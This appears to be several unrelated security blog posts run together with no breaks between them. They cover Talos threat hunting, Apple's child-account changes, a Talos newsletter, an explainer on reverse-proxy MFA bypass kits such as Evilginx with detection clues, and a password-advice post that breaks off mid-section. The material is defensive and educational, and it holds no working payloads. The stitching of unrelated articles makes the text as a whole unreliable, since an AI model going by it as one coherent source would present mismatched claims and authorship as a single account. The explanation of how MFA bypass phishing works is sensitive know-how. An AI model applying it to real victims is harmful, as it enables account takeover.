At Cisco Talos, we understand that effective cybersecurity isn’t just about responding to incidents — it’s about preventing them from happening in the first place. One of the most powerful ways we do this is through proactive threat hunting. Our Talos Incident Response (Talos IR) team works closely with organizations to not only address existing threats but to anticipate and mitigate potential future risks. A key component of our threat-hunting approach is the Splunk SURGe team’s PEAK Threat Hunting Framework, which enables us to conduct comprehensive and proactive hunts with precision.
What is the PEAK Threat Hunting Framework?
The PEAK Framework (Prepare, Execute, and Act with Knowledge) offers a structured methodology for conducting effective and focused threat hunts. It ensures that every hunt is aligned with an organization’s specific needs and threat landscape. At the core of the PEAK framework are baseline hunts, which lay the foundation for proactive threat detection, alongside advanced techniques such as hypothesis-driven hunts and model-assisted threat hunts (M-ATH), which further enhance threat detection and mitigation.
Baseline hunts: the foundation of proactive threat hunting
Baseline hunts involve establishing a clear understanding of an organization’s normal operating environment in terms of user activity, network traffic and system processes. By documenting and analyzing this baseline, Talos IR can identify anomalous behavior that may signal malicious activity.
While these hunts can be a reactive measure, it’s important to use them proactively to detect threats trying to blend in with regular operations, such as insider threats, advanced persistent threats (APTs) and even novel attack techniques that might otherwise go undetected.
The key steps in baseline hunts are:
Defining Normal Activity: Understanding what “normal” looks like in your environment, using data from system logs, user behavior, and network traffic.
Anomaly Detection: Proactively hunting for deviations from the baseline that could indicate potential threats.
Refining the Baseline: Continuously improving and updating the baseline to account for emerging threats and changes in your infrastructure.
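As a simplified illustration of this baselining idea (not Talos IR's actual tooling), the sketch below computes a per-host baseline of daily event counts and flags days that deviate sharply from it. The hosts, counts, and threshold are invented for the example.

```python
from statistics import mean, stdev

# Hypothetical daily event counts per host (e.g., outbound connections),
# standing in for whatever telemetry the baseline is built from.
history = {
    "workstation-01": [112, 98, 105, 120, 101, 99, 118],
    "workstation-02": [45, 52, 38, 60, 47, 55, 49],
}
today = {"workstation-01": 109, "workstation-02": 290}

THRESHOLD = 3.0  # flag anything more than 3 standard deviations above the baseline

for host, counts in history.items():
    baseline, spread = mean(counts), stdev(counts)
    observed = today[host]
    if spread and (observed - baseline) / spread > THRESHOLD:
        print(f"{host}: {observed} events today vs. baseline of {baseline:.0f} -- investigate")
```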
Hypothesis-driven hunts: Testing assumptions about threats
In addition to baseline hunts, Talos IR also uses hypothesis-driven hunts to proactively test assumptions about potential threats. These hunts are guided by specific hypotheses or educated guesses about what attackers might be doing in a given environment. Rather than relying on a static, one-size-fits-all approach, hypothesis-driven hunts are dynamic, adapting to the specific questions and emerging threats that arise.
For example, a hypothesis-driven hunt might begin with the assumption that a particular group of users is being targeted by a phishing campaign. The hunt would focus on testing this assumption by looking for evidence of malicious emails, unusual login patterns or attempts to collect or exfiltrate data.
The key steps in hypothesis-driven hunts are:
Forming Hypotheses: Based on threat intelligence and past incidents, teams generate specific hypotheses about possible attack vectors or adversary behaviors.
Testing Hypotheses: Using data sources such as endpoint telemetry, authentication logs or network traffic, the hypothesis is tested to see if evidence supports the theory.
Analyzing Results: If the hypothesis is validated, further investigation is done to understand the full scope of the potential threat.
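To make the testing step concrete, here is a minimal sketch with made-up log records that checks a targeted group of users for sign-ins from countries never seen for them during the baseline period, one simple way to look for the unusual login patterns mentioned above. In practice, the events would come from an identity provider or SIEM.

```python
# Hypothetical authentication events pulled from an identity provider or SIEM.
auth_events = [
    {"user": "alice", "country": "US"},
    {"user": "alice", "country": "RO"},
    {"user": "bob", "country": "DE"},
]

targeted_users = {"alice", "bob"}                     # the group the hypothesis is about
known_countries = {"alice": {"US"}, "bob": {"DE"}}    # observed during the baseline period

for event in auth_events:
    user, country = event["user"], event["country"]
    if user in targeted_users and country not in known_countries.get(user, set()):
        print(f"Hypothesis supported: {user} signed in from unfamiliar country {country}")
```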
Model-assisted threat hunts: Leveraging machine learning to find hidden threats
Another powerful tool in Talos IR’s proactive hunting approach is model-assisted threat hunts (M-ATHs). These hunts leverage machine learning and advanced statistical models to sift through vast amounts of data and identify patterns that may indicate hidden threats. M-ATHs allow our team to detect threats that would be difficult to find using traditional methods.
Machine learning models are trained to detect suspicious behavior across different domains — such as user activity, network traffic or system logs — by looking for deviations from typical patterns. Over time, as these models learn from new data and threat intelligence, they improve in their ability to detect emerging threats.
The key steps in M-ATHs are:
Data Collection: Gathering large datasets from multiple sources, including network traffic, endpoint data, authentication logs, and more.
Model Training: Using machine learning algorithms to identify patterns in normal and malicious behavior.
Anomaly Detection: The trained model helps identify new, previously undetected anomalies or potential threats by looking for deviations from established patterns.
Refinement: The model is refined as new data is collected and analyzed, improving its ability to detect subtle threats.
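As a rough sketch of what a model-assisted hunt can look like in code, the example below trains scikit-learn's IsolationForest on historical per-session features and scores new activity for anomalies. The library, features, and numbers are illustrative assumptions, not the models Talos actually uses.

```python
import numpy as np
from sklearn.ensemble import IsolationForest

# Hypothetical per-session features: [megabytes_sent, distinct_destinations, after_hours_logins]
baseline_sessions = np.array([
    [5.2, 3, 0], [4.8, 2, 0], [6.1, 4, 1], [5.5, 3, 0], [4.9, 2, 0],
])
new_sessions = np.array([
    [5.0, 3, 0],      # looks like the baseline
    [850.0, 40, 6],   # large, exfiltration-like outlier
])

model = IsolationForest(contamination="auto", random_state=42)
model.fit(baseline_sessions)            # learn what "normal" looks like
verdicts = model.predict(new_sessions)  # -1 = anomaly, 1 = normal

for features, verdict in zip(new_sessions, verdicts):
    label = "ANOMALY" if verdict == -1 else "normal"
    print(label, features)
```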
Empowering threat hunts with Talos Threat Intelligence
A crucial element that enriches and empowers every Talos IR threat hunt is Talos Threat Intelligence. By integrating up-to-date, high-fidelity threat intelligence into our hunts, we enhance the accuracy, relevance, and speed of our investigations. Talos Threat Intelligence provides a continuous stream of data on emerging threats, attack trends and adversary tactics, which helps us refine hypotheses, adjust baselines and improve our machine learning models.
This intelligence is not just a complement to our hunting process; it is embedded in every stage. It helps guide our hypothesis-driven hunts, sharpens our baseline detections and feeds into the models we use for anomaly detection. With Talos Threat Intelligence, we ensure that every hunt is aligned with the latest threat landscape, empowering your team with the knowledge needed to stay one step ahead of attackers.
Proactive engagements for IR Retainer customers
For Talos IR Retainer customers, baseline hunts, hypothesis-driven hunts, and model-assisted threat hunts provide a valuable layer of ongoing, proactive support. These hunts help organizations detect and mitigate threats before they escalate into full-blown incidents. Our expert hunters work directly with your teams, ensuring that you stay ahead of evolving threats.
Some key benefits of these proactive engagements include:
Early Detection: Identifying abnormal activities that could signal a breach or malicious action, reducing the risk of an attack spreading.
Continuous Improvement: As we refine the baseline and hunting models, your security posture improves over time, allowing for faster and more accurate threat detection.
Actionable Insights: Proactive hunts deliver actionable intelligence that helps your teams strengthen their defenses, based on the latest threat trends and attack methods.
Why it matters
The cybersecurity landscape is constantly evolving, and traditional defensive methods alone are no longer sufficient. Threat actors are adept at blending malicious activity with normal operations, making it difficult to spot attacks using conventional means. By conducting baseline hunts, hypothesis-driven hunts and model-assisted threat hunts, Talos IR gives your organization the tools it needs to stay ahead of adversaries.
As new evidence is uncovered during a hunt, our team adapts and refines the investigation in real time — evolving the hypothesis, adjusting the scope or pivoting to new areas of focus based on what the data reveals.
If an active threat, adversary or malicious activity is detected during a hunt, Talos IR can dynamically pivot the engagement and escalate the situation to our 24/7 on-call Incident Response team. This ensures rapid response for containment, mitigation and eradication, effectively minimizing the potential impact of the threat.
Our Talos IR team collaborates seamlessly with the hunting team to deliver real-time support in identifying, isolating and neutralizing active threats. This integrated approach ensures your systems remain secure and prevents the threat from escalating further.
At Talos, our goal is to empower your team with the knowledge and tools to detect threats proactively, before they turn into incidents. Through our IR Retainer services, we provide continuous support to help you improve your security posture and stay one step ahead of emerging threats, all while leveraging the full power of Talos Threat Intelligence.
For more information about this service, download our At-a-Glance.
Earlier this year, Apple announced a string of new initiatives aimed at creating a safer environment for young kids and teens using the company’s devices. Besides making it easier to set up kids’ accounts, the company plans to give parents the option of sharing their children’s age with app developers so as to be able to control what content they show.
Apple says these updates will be made available to parents and developers later this year. In this post, we break down the pros and cons of the new measures. We also touch on what Instagram, Facebook (and the rest of Meta) have to do with it, and discuss how the tech giants are trying to pass the buck on young users’ mental health.
Before the updates: how Apple protects kids right now
Before we talk about Apple’s future innovations, let’s quickly review the parental control status quo on Apple devices. The company introduced its first parental controls way back in June 2009 with the release of iPhone OS 3.0, and has been developing them bit by bit ever since.
As things stand, users under 13 must have a special Child Account. These accounts allow parents to access the parental control features built into Apple’s operating systems. Teenagers can continue using a Child Account until the age of 18, as their parents see fit.
What Apple’s Child Account management center currently looks like. Source
Now for the new stuff…
The company has announced a series of changes to its Child Account system related to how parental status is verified. Additionally, it’ll soon be possible to edit a child’s age if it was entered incorrectly. Previously, for accounts of users under 13, it wasn’t even an option: Apple suggested waiting “for the account to naturally age up”. In borderline cases (accounts of kids just under 13), you could try a workaround involving changing the birth date — but such tricks won’t be needed for much longer.
But perhaps the most significant innovation relates to simplifying the creation of these Child Accounts. Henceforth, if parents don’t set up a device before their child under 13 starts using it, the child can do it themselves. In this case, Apple will automatically apply age-appropriate web content filters and only allow pre-installed apps, such as Notes, Pages, and Keynote.
Upon visiting the App Store for the first time to download an app, the child will be prompted to ask a parent to complete the setup. Importantly, until parental consent is given, neither app developers nor Apple itself can collect data on the child.
At this point, even the least tech-savvy parent might ask the logical question: what if my child enters the wrong age during setup? Say, not 10, but 18. Won’t the deepest, darkest corners of the internet be opened up to them?
How Apple intends to solve the age verification issue
The single most substantial of Apple’s new initiatives announced in early 2025 attempts to address the problem of online age verification. The company proposes the following solution: parents will be able to select an age category and authorize sharing this information with app developers during installation or registration.
This way, instead of relying on young users to enter their date-of-birth honestly, developers will be able to use the new Declared Age Range API. In theory, app creators will also be able to use age information to steer their recommendation algorithms away from inappropriate content.
Through the API, developers will only know a child’s age category — not their exact date of birth. Apple has also stated that parents will be able to revoke permission to share age information at any time.
In practice, access to the age category will become yet another permission that young users will be able to give (or, more likely, not give) to apps — just like permissions to access the camera and microphone, or to track user actions across apps.
This is where the main flaw of the proposed solution lies. At present, Apple has given no guarantee that if a user denies permission for age-category access, they won’t be able to use a downloaded app. This decision rests with app developers, as there are no legal consequences for allowing children access to inappropriate content. Moreover, many companies are actively seeking to grow their young audience, since young kids and teens spend a lot of their time online (more on this below).
Finally, let’s mention Apple’s latest innovation: it’s updating its age-rating system. It will now consist of five categories: 4+, 9+, 13+, 16+, and 18+. In the company’s own words, “This will allow users a more granular understanding of an app’s appropriateness, and developers a more precise way to rate their apps”.
Apple is updating its age rating system — it will comprise five categories. Source
Apple and Meta disagree over who’s responsible for children’s safety online
The problem of verifying a young person’s age online has long been a hot topic. The idea of showing ID every time you want to use an app is, naturally, hardly a crowd-pleaser.
At the same time, taking all users at their word is asking for trouble. After all, even an 11-year-old can figure out how to edit their age in order to register on TikTok, Instagram, or Facebook.
App developers and app stores are all too eager to lay the responsibility for verifying a child’s age at anyone else’s doorstep but their own. Among app developers, Meta is particularly vocal in advocating that age verification is the duty of app stores. And app stores (especially Apple’s) insist that the buck stops with app developers.
Many view Apple’s new initiatives on this matter as a compromise. Meta itself has this to say:
“Parents tell us they want to have the final say over the apps their teens use, and that’s why we support legislation that requires app stores to verify a child’s age and get a parent’s approval before their child downloads an app”.
All very well on paper — but can it be trusted?
Child safety isn’t the priority: why you shouldn’t trust tech giants
Entrusting kids’ online safety to companies that directly profit from the addictive nature of their products doesn’t seem like the best approach. Leaks from Meta, whose statements on Apple’s solution we cited above, have repeatedly shown that the company targets young users deliberately.
For example, in her book Careless People, Sarah Wynne-Williams, former global public policy director at Facebook (now Meta), recounts how in 2017 she learned that the company was inviting advertisers to target teens aged 13 to 17 across all its platforms, including Instagram.
At the time, Facebook was selling the chance to show ads to youngsters at their most psychologically vulnerable — when they felt “worthless”, “insecure”, “stressed”, “defeated”, “anxious”, “stupid”, “useless”, and/or “like a failure”. In practice, this meant, for example, that the company would track when teenage girls deleted selfies to then show them ads for beauty products.
Another leak revealed that Facebook was actively hiring new employees to develop products aimed at kids as young as six, with the goal of expanding its consumer base. It’s all a bit reminiscent of tobacco companies’ best practices back in the 1960s.
Apple has never particularly prioritized kids’ online safety, either. For a long time its parental controls were quite limited, and kids themselves were quick to exploit holes in them.
It wasn’t until 2024 that Apple finally closed a vulnerability allowing kids to bypass controls just by entering a specific nonsensical phrase in the Safari address bar. That was all it took to disable Screen Time controls for Safari — giving kids access to any website. The vulnerability was first reported back in 2021, yet it took three years for the company to react.
Content control: what really helps parents
Child psychology experts agree that unlimited consumption of digital content is bad for children’s psychological and physical health. In his 2024 book The Anxious Generation, US psychologist Jonathan Haidt describes how smartphone and social media use among teenage girls can lead to depression, anxiety, and even self-harm. As for boys, Haidt points to the dangers of overexposure to video games and pornography during their formative years.
Apple may have taken a step in the right direction, but it’ll be for nothing if third-party app developers decide not to play ball. And as the example of Meta illustrates, relying on their honesty and integrity seems premature.
Therefore, despite Apple’s innovations, if you need a helping hand, you’ll find one… at the end of your own arm. If you want to maintain control over what and how much your child consumes online with minimal interference in their life, look no further than our parental control solution.
Kaspersky Safe Kids lets you view reports detailing your child’s activity in apps and online in general. You can use these to customize restrictions and prevent digital addiction by filtering out inappropriate content in search results and, if necessary, blocking specific sites and apps.
What other online threats do kids face, and how can you neutralize them?
Welcome to this week’s edition of the Threat Source newsletter.
Recently, I was invited to sit on a panel at the CIO4Good Conference here in Washington D.C., where I talked about incident response and cyber preparedness to a room full of CIOs who help lead wonderful missions to help others. I’m incredibly fortunate to be able to volunteer for the NGO community. I’ve been involved with them for a few years now, and it has been a singular experience.
I sit in a uniquely blessed situation. Cisco Talos is resourced to help protect our customers — we have expertise, tooling and a huge array of diverse security skillsets. A humanitarian assistance or non-governmental organization (NGO) usually has none or very few of these luxuries. If I can take some of my time and experience here at Talos and help others who provide housing to the homeless, protect refugees or feed the hungry, damn right I’m gonna do it. And NGOs? They really need help.
In today’s global humanitarian funding climate, money and grants are hard to come by. This means the competition for the dollars that remain is fierce, and that things like cybersecurity can fall by the wayside. But security in an NGO is incredibly important. We’re talking about incredibly vulnerable and marginalized people who deserve aid, and the amazing volunteers who should have privacy without malicious interference.
The hard truth is that cybersecurity can be a bleak space. We as professionals do not operate in the “good news” business. We work, and thrive, in adversarial conditions — actively searching for what the bad guys are doing and learning how they are coming after the good guys. They’re launching ransomware. They are extorting and causing real harm to others. This is day in and day out, and it can wear you down mentally. You have to endure and focus on the mission. After all, that’s the gig.
This is why I enjoy volunteering by either giving some of my time and expertise to a mentee or to an NGO that has an outstanding mission to help others. It puts fuel in your soul and reminds you that others are fighting their own good fights. These organizations are some of the best. They have a thankless, often dangerous, mission to help others have better lives. The way I see it, volunteering is the least I could do.
This week is bittersweet because we’re discussing the final section of Talos’ 2024 Year in Review report. Let’s jump into the abyss of AI-based threats together.
Why do I care?
AI may not have upended the threat landscape last year, but it’s setting the stage for 2025, where agentic AI and automated vulnerability discovery could pose serious challenges for defenders. The future may bring:
The use of agentic AI to conduct multi-stage attacks or find creative ways to access restricted systems
Improved personalization and professionalization of social engineering
Automated vulnerability discovery and exploitation
Capabilities to compromise AI models, systems and infrastructure that organizations around the world are building
So now what?
Continue to stay informed and alert, and for more information, read Talos’ blog post about these threats or download the full Year in Review.
Top security headlines of the week
AirPlay Vulnerabilities Expose Apple Devices to Zero-Click Takeover. The identified security defects, 23 in total, could be exploited over wireless networks and peer-to-peer connections, leading to the complete compromise of not only Apple products, but also third-party devices that use the AirPlay SDK. (SecurityWeek)
4 Million Affected by VeriSource Data Breach. VeriSource says the stolen information belonged to employees and dependents of companies using its services. It has been working with its customers to “collect the necessary information to notify additional individuals affected by this incident.” (SecurityWeek)
SAP NetWeaver Visual Composer Flaw Under Active Exploitation. CVE-2025-31324 is a critical vulnerability with a maximum CVSS score of 10 that affects all SAP NetWeaver 7.xx versions. It allows unauthenticated remote attackers to upload arbitrary files to Internet exposed systems without any restrictions. (DarkReading)
FBI shares massive list of 42,000 LabHost phishing domains. The FBI has shared 42,000 phishing domains tied to the LabHost cybercrime platform, one of the largest global phishing-as-a-service (PhaaS) platforms that was dismantled in April 2024. (BleepingComputer)
Can’t get enough Talos?
State-of-the-art phishing: MFA bypass. Cybercriminals are bypassing multi-factor authentication (MFA) using adversary-in-the-middle (AiTM) attacks via reverse proxies, intercepting credentials and authentication cookies.
TTP Episode 11. Craig, Bill and Hazel discuss three of the biggest callouts from Cisco Talos’ latest Incident Response Quarterly Trends.
Talos Takes: Identity and MFA. Hazel and friends discuss how AI isn’t rewriting the cybercrime playbook, but it is turbocharging some of the old tricks, particularly on the social engineering side.
Cybercriminals are bypassing multi-factor authentication (MFA) using adversary-in-the-middle (AiTM) attacks via reverse proxies, intercepting credentials and authentication cookies.
The developers behind Phishing-as-a-Service (PhaaS) kits like Tycoon 2FA and Evilproxy have added features to make them easier to use and harder to detect.
WebAuthn, a passwordless MFA solution using public key cryptography, prevents password transmission and renders server-side authentication databases useless to attackers, offering a robust defense against MFA bypass attacks.
Despite its strong security benefits, WebAuthn has seen slow adoption. Cisco Talos recommends that organizations reassess their current MFA strategies in light of these evolving phishing threats.
For the past thirty years, phishing has been a staple in many cybercriminals’ arsenals. All cybersecurity professionals are familiar with phishing attacks: Criminals impersonate a trusted site in an attempt to social engineer victims into divulging personal or private information such as account usernames and passwords. In the early days of phishing, it was often enough for cybercriminals to create fake landing pages matching the official site, harvest authentication credentials and use them to access victims’ accounts.
Since that time, network defenders have endeavored to prevent these types of attacks using a variety of techniques. Besides implementing strong anti-spam systems to filter phishing emails out of users’ inboxes, many organizations also conduct simulated phishing attacks on their own users to train them to recognize phishing emails. These techniques worked for a time, but as phishing attacks have become more sophisticated and more targeted, spam filters and user training have become less effective.
At the root of this problem is the fact that usernames are often easy to guess or discover, and people are generally very bad at using strong passwords. People also tend to re-use the same weak passwords across many different sites. Cybercriminals, armed with a victim’s username and password, will often attempt credential stuffing attacks, and log into many different sites using the same username/password combination.
To prove that users are valid, authentication systems generally rely on at least one of three authentication methods or factors:
Something you know (e.g., a username and password)
Something you have (e.g., a smartphone or USB key)
Something you are (e.g., your fingerprint or face recognition)
In the presence of increasingly sophisticated phishing messages, using only one authentication factor, such as a username/password, is problematic. Many network defenders have responded by implementing MFA, which includes an additional factor, such as an SMS message or push notification, as an extra step to confirm a user’s identity when logging in. By including an additional factor in the authentication process, compromised usernames and passwords become much less valuable to cybercriminals. However, cybercriminals are a creative bunch, and they have devised a clever way around MFA. Enter the wild world of MFA bypass!
Typically, this is done using a reverse proxy. A reverse proxy functions as an intermediary server, accepting requests from the client before forwarding them on to the actual web servers to which the client wishes to connect.
To bypass MFA the attacker sets up a reverse proxy and sends out phishing messages as normal. When the victim connects to the attacker’s reverse proxy, the attacker forwards the victim’s traffic onwards to the real site. From the perspective of the victim, the site they have connected to looks authentic — and it is! The victim is interacting with the legitimate website. The only difference perceptible to the victim is the location of the site in the web browser’s address bar.
By inserting themselves in the middle of this client-server communication the attacker is able to intercept the username and password as it is sent from the victim to the legitimate site. This completes the first stage of the attack and triggers an MFA request sent back to the victim from the legitimate site. When the expected MFA request is received and approved, an authentication cookie is returned to the victim through the attacker’s proxy server where it is intercepted by the attacker. The attacker now possesses both the victim’s username/password as well as an authentication cookie from the legitimate site.
Figure 1. Flow diagram illustrating MFA bypass using a reverse proxy.
Phishing-as-a-Service (PhaaS) kits
Thanks to turnkey Phishing-as-a-Service (PhaaS) toolkits, almost anyone can conduct these types of phishing attacks without knowing much about what is happening under the hood. Toolkits such as Tycoon 2FA, Rockstar 2FA, Evilproxy, Greatness, Mamba 2FA and more have emerged in this space. Over time the developers behind some of these kits have added features to make them easier to use and harder to detect:
PhaaS MFA bypass kits typically include templates for the most popular phishing targets to aid cybercriminals in the task of setting up their phishing campaigns.
MFA bypass kits limit access to the phishing links to only users who possess the correct phishing URL and redirect other visitors to benign webpages.
MFA bypass kits often check the IP address and/or User-Agent header of the visitor, preventing access if the IP address corresponds to a known security company/crawler or if the User-Agent indicates that it is a bot. User-Agent filters may also be used to further target the phishing attacks towards users running specific hardware/software.
Reverse proxy MFA bypass kits typically inject their own JavaScript code into the pages they serve to victims to gather additional information about the visitor, and handle redirects after the authentication cookie has been stolen. These scripts are often dynamically obfuscated to prevent static fingerprinting that would allow security vendors to identify the MFA bypass attack sites.
To thwart anti-phishing defenses which may automatically visit URLs contained in an email at the time it is received, there may be a short, programmable delay between when the phishing message is sent and when the phishing lure URL is activated.
Figure 2. An example phishing message associated with the Tycoon 2FA phishing toolkit.
Accelerating the rise in MFA bypass attacks via reverse proxy are publicly available open-source tools, such as Evilginx. Evilginx debuted in 2017 as a modified version of the popular open-source web server nginx. Over time, the application was redesigned and rewritten in Go, and it now implements its own HTTP and DNS server. Although it is marketed as a tool for red teams’ penetration testing needs, because it is open source, anyone can download and modify it.
Fortunately for defenders, there are characteristics common to Evilginx deployments, as well as other AiTM MFA bypass toolkits, that can provide clues an MFA bypass attack may be in progress:
Many MFA bypass reverse proxy servers are hosted on relatively newly registered domains/certificates.
Capturing an authentication cookie only gives attackers access to the victim’s account for that single session. Once they have access to a victim’s account, many attackers add additional MFA devices to the account to maintain persistence. By auditing MFA logs for this kind of activity, defenders may find accounts that have fallen victim to MFA bypass attacks.
By default, Evilginx phishing lure URLs have a URL path consisting of 8 mixed case letters.
By default, Evilginx uses TLS certificates obtained from Let’s Encrypt. Additionally, the certificates it creates by default have an Organization set to “Evilginx Signature Trust Co.”, and a CommonName set to “Evilginx Super-Evil Root CA”.
After a session authentication cookie has been intercepted by the attacker, they will typically load this cookie into their own browser to impersonate the victim. Unless the attacker is careful, for a time, there will be two different users with different User-Agents and IP addresses using the same session cookie. This may be discoverable through web logs or security products that look for things like “impossible travel” (see the sketch after this list).
To avoid the victim clicking a link that redirects them away from the phishing site, the Evilginx reverse proxy rewrites URLs contained in the HTML from the legitimate site. Popular phishing targets may utilize very specific URL paths, and network defenders can look for these URL paths being served from servers other than the legitimate site.
Many MFA bypass reverse proxy implementations are written using Transport Layer Security (TLS) implementations that are native to that programming language. Thus, the TLS fingerprint of the reverse proxy and the legitimate website will be different.
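Building on the session-cookie observation above, network defenders can hunt for a single session cookie that appears with more than one client fingerprint. The sketch below is a minimal Python illustration using invented log records; the field names and log format are assumptions, not any specific product’s schema.

```python
from collections import defaultdict

# Hypothetical web log entries: (session_cookie, source_ip, user_agent)
log_entries = [
    ("sess-abc123", "203.0.113.10", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),
    ("sess-abc123", "198.51.100.7", "python-requests/2.31"),
    ("sess-def456", "203.0.113.22", "Mozilla/5.0 (Macintosh)"),
]

clients_per_session = defaultdict(set)
for cookie, ip, user_agent in log_entries:
    clients_per_session[cookie].add((ip, user_agent))

for cookie, clients in clients_per_session.items():
    if len(clients) > 1:
        print(f"{cookie}: used by {len(clients)} distinct clients -- possible stolen session cookie")
        for ip, ua in sorted(clients):
            print(f"    {ip}  {ua}")
```

In a real environment, the same grouping would be run against proxy or application logs and combined with geolocation to catch the “impossible travel” pattern mentioned above.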
WebAuthn to the rescue?
The FIDO (Fast IDentity Online) Alliance and the W3C created WebAuthn (Web Authentication API) — a specification that enables MFA based on public key cryptography. WebAuthn is essentially passwordless. When a user registers for MFA using WebAuthn, a cryptographic keypair is generated. The private key is kept on the user’s device, and the corresponding public key is kept on the server.
When a client wants to log in, they indicate this to the server, which responds with a challenge. The client then signs this data and returns it to the server. The server uses the stored public key to verify that the challenge was signed with the user’s private key. No passwords are ever entered into a web form, and no passwords are transmitted over the internet. This also has the side effect of making server-side authentication databases useless to attackers. What good will stealing a public key do?
Figure 3. The WebAuthn authentication process.
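The heart of this exchange, a random server-issued challenge signed by a private key that never leaves the user’s device, can be sketched with a generic EC keypair. This is only an illustration of the principle using Python’s cryptography package; the real WebAuthn ceremony also involves attestation, origin binding, and signature counters.

```python
import os
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

# Registration: the authenticator creates a keypair; only the public key is sent to the server.
private_key = ec.generate_private_key(ec.SECP256R1())
server_stored_public_key = private_key.public_key()

# Authentication: the server sends a random challenge...
challenge = os.urandom(32)

# ...the authenticator signs it with the private key, which never leaves the device...
signature = private_key.sign(challenge, ec.ECDSA(hashes.SHA256()))

# ...and the server verifies the signature using the stored public key.
try:
    server_stored_public_key.verify(signature, challenge, ec.ECDSA(hashes.SHA256()))
    print("Challenge signature valid: user authenticated")
except InvalidSignature:
    print("Signature invalid: authentication rejected")
```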
As an extra layer of security, WebAuthn credentials are also bound to the website origin where they will be used. For example, suppose a user clicks a link in a phishing message and navigates to an attacker-controlled reverse proxy at mfabypass.com, which is impersonating the user’s bank. The location in the web browser’s address bar will not match the location of the bank to which the credentials are bound, and the WebAuthn MFA authentication process will fail. Binding credentials to a specific origin also eliminates related identity-based attacks such as credential stuffing, where attackers try to reuse the same credentials at multiple sites.
Although the WebAuthn specification was first published back in 2019, it has experienced relatively slow adoption. Based on authentication telemetry data from Cisco Duo for the past six months, it appears that WebAuthn MFA authentications still make up a very low percentage of all MFA authentications.
To a certain degree, this is understandable. Many organizations may have already rolled out other types of MFA and may feel like that is enough protection. However, they may want to rethink their approach as more and more phishing attacks implement MFA bypass strategies.
Coverage
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
The flow of new information we’re bombarded with never ebbs. In 2025, you get less and less room in your head for things like the password for the email account you set up back in 2020 to sign your mom up for that online marketplace. On World Password Day, which falls on May 1 this year, we suggest putting in a little effort to combat poor memory, weak passwords, and cybercrooks.
As our experts have repeatedly proven, it’s only a matter of time — and money — before someone targeting your password cracks it. Often, it takes very little time and money, too. Our mission is to complicate cracking your password as much as possible, so hackers lose any desire to go after your data.
Our study last year found that intelligent algorithms — whether running on a powerful graphics card like the RTX 4090 or on inexpensive leased cloud hardware — can crack 59% of all passwords in the world in under an hour. We’re in the middle of that study’s phase two, and we’re about to share whether the situation has changed for the better over the year, so subscribe to our blog or Telegram channel to be among the first to know.
Today’s conversation covers more than just the most secure authentication methods and ways to make strong passwords. We’ll discuss techniques for remembering passwords, and answer the question of why using a password manager in 2025 is a really good idea.
How to sign in more securely in 2025
There are several options for signing in to online services and websites today: traditional passwords, one-time codes delivered by SMS or generated in authenticator apps, hardware tokens, and passkeys.
Naturally, any of these methods can be compromised (for example, by leaving your hardware token sticking out of the USB port of an unattended computer in a public place), or toughened up (for example, by creating a complex password of more than 20 random characters). And so, as the era of traditional passwords isn’t over just yet, let’s try to figure out how we can improve our current standing by coming up with and memorizing an easy-to-remember password.
How do you remember a complex password?
Before answering this question, let’s recall the basic truths about passwords:
Recommended length: 12–16 characters.
A password should use different types of characters: numbers, lowercase and uppercase letters, and special characters.
A password shouldn’t contain personal information easily traced back to the user.
Got it? Good. Now for the key issue: a complex password is easy to forget; a simple one — easy to crack. To help you achieve a balance between the two, we’ve put together some well-known, but still effective rules for creating easy-to-remember passwords.
Basic level
String together some unrelated words like the ones used in seed phrases when registering crypto wallets. And add a couple of numbers and special characters on the end that are meaningful to you but won’t be easily guessed by an attacker.
Example: DryLandStandGift2015;)
Shorter words are easier to remember, and the number shouldn’t be the year you or a loved one was born. It could be any memorable combination, such as the year you first went to Disneyland, the license plate of your first car, or your wedding date.
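If you’d rather not invent the words and numbers yourself, a few lines of code using a cryptographically secure random source can do it for you. This is a minimal sketch using Python’s secrets module; the word list here is tiny and purely illustrative, and a real one should contain thousands of words.

```python
import secrets
import string

# A tiny illustrative word list; use a large dictionary in practice.
WORDS = ["dry", "land", "stand", "gift", "river", "stone", "cloud", "lamp"]
SPECIALS = "!;)?#*"

def memorable_password(num_words: int = 4) -> str:
    words = [secrets.choice(WORDS).capitalize() for _ in range(num_words)]
    digits = "".join(secrets.choice(string.digits) for _ in range(4))
    return "".join(words) + digits + secrets.choice(SPECIALS)

print(memorable_password())  # e.g. RiverLampStoneGift4821#
```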
Advanced level
Think of a favorite line from a song or a memorable quote from a movie, and then replace, say, every second or third letter with special characters that aren’t in sequential order on the keyboard. Using easily accessible special characters (those you see on your phone’s on-screen keyboard in numeric mode) is handier. This is how you can make a strong password that’s quick to type and makes your life easier.
For example, if you’re a fan of the Harry Potter saga, you may try to use the Avada Kedavra spell for a good cause. Let’s try transforming this killing curse according to the rule above while peppering it generously with capital letters: A!ad@Kd$vr%. At first glance, a password like that looks impossible to remember, but all it takes is a little typing practice. Type it up two or three times, and you’ll see your fingers reaching for the right keys by themselves.
How about entrusting password generation to neural networks?
With the recent surge of ChatGPT and other large language models (LLMs), users have started turning to them for passwords. And it’s easy to see why that would be an appealing option: instead of straining to come up with a strong password, you just ask the AI assistant to generate it — with immediate results. And you can ask to make that password mnemonic if you wish to.
Alas, the danger of using AI as a strong password generator is that it creates combinations of characters that only appear random to the human eye. Passwords generated by AI are not as reliable as they may seem at first glance…
Alexey Antonov, Data Science Team Lead at Kaspersky, who conducted the previous password strength study, has generated a thousand passwords with ChatGPT, Llama, and DeepSeek each. It turned out each model knew that a good password consisted of at least a dozen characters, including both uppercase and lowercase letters, numbers, and special characters. However, DeepSeek and Llama sometimes generated passwords consisting of dictionary words, with some letters replaced with similar-looking numbers or symbols, such as B@n@n@7 or S1mP1eL1on. Amusingly, both models seemed to have a soft spot for the Password password, providing such variations as P@ssw0rd, P@ssw0rd!23, P@ssw0rd1, or P@ssw0rdV.
